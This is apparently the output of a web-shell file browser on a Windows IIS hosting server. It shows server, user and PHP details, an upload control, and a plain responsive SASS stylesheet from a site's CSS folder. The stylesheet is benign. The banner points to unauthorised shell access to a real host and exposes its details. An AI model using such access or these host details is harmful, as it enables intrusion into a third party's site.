HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
Upload Files
File: D:/HostingSpaces/SBogers85/equichecker.com/wwwroot/css/_responsive.sass
@media screen and (max-width: 1100px)
  .container
    display:block

  .main-panel
    padding: 35px !important
    flex-direction: column
    .col-first
      width: 100% !important
      .content
        width: 100% !important
    .col-second
      width: 100% !important
      .content
        width: 100% !important
    .col-third
      width: 100% !important
      .content 
        width: 100% !important

    .vertical-seperator
      -ms-transform: rotate(90deg)
      -webkit-transform: rotate(90deg)
      transform: rotate(90deg)

@media screen and (max-width: 768px)
  .header
    flex-direction: column !important
    margin-bottom: 50px

@media screen and (max-width: 550px)
  .profile
    flex-direction: column !important